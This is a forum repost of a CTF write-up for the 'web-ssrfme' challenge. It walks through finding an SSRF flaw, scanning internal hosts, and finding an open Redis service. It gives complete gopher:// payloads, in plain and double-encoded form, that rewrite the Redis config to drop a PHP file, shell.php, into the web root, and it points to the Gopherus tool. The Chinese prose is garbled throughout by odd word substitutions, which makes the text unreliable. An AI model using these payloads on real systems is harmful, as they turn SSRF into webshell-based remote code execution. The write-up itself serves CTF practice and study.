一道ssrf题目--Web-ssrfme

渣渣兔  金牌会员 | 2024-8-27 03:45:36 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 503|帖子 503|积分 1509

目录

情况搭建
代码分析
漏洞点寻找
排泄
利用工具构造payload
效果
​编辑 

情况搭建

利用docker拉取上面文件
  1. root@ubuntu:~/web-ssrfme/web-ssrfme# docker-compose up -d
复制代码
代码分析

首先进入题目情况,查察docker发如今8091端口下,进入后出现这么个页面

查察代码发现file和dict都被过滤了

我们再接着看代码发现如果存在info这个参数就会打印phpinfo,打印这个东西就大概会出现一些对我们有用的信息我们看一下这里有IP和中间件

漏洞点寻找

我们实验用http访问以下phpinfo的IP,他将页面打印了两次,这里说明http协议可以利用,我们可以用http协议来探测端口

 然后我们用bp探测,发现没啥反应这个服务器好像没有啥子特殊的服务,好像就开放了一个80端口


我们接着实验,我们如今发现服务器的IP是172.21.0.3这个端口,这是在内网当中,在内网当中服务器大概会很多,并且服务器IP大概是连续的,我们可以实验一下有没有别的服务器供我们入侵
在172.20.0.1有这么个表现

在172.20.0.2下有这么个表现

然后接着探测有什么服务,我们发现172.20.0.2的6379好像开着

排泄

我们可以传webshell到服务器上,但是这个必要我们知道物理路径,这道题目物理路径我们是不知道,必要我们猜测,我们实验一些默认路径/var/www/html、 /usr/shart/nginx/html,发现都不行。如今我们怀疑是不是权限不够的缘故原由,权限不够那咋个办,我们再找一下在html下有没有别的文件权限是够的。我们找个字典用bp扫描一下,发现有个upload

实验在这个路径下 /var/www/html/upload利用gopher协议举行webshell写入
利用工具构造payload

我们这里利用gopherus这个工具来构造我们的payload
工具下载地址:GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
我这里写入的是phpinfo,当然也可以写一句话木马,留意IP地址要修改
  1. gopher://172.20.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2420%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
复制代码

下面我们来看一下上面的注入语句解码后是什么东西,如下图是redis的一些写入语句

 然后我们在注入的时候还必要举行一次url编码,因为在源代码中解了两次码
  1. gopher%3a%2f%2f172.20.0.2%3a6379%2f_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252425%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%2520%253F%253E%2f%2f%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2fvar%2fwww%2fhtml%2fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
复制代码
我们打开情况看一下文件是否写进去了,确实写进来了,而且反面有一堆乱码,所以我们在写入注入语句的时候反面加了解释预防干扰

效果

然后将下令换一下就可以继续排泄了
 


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

正序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

渣渣兔

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表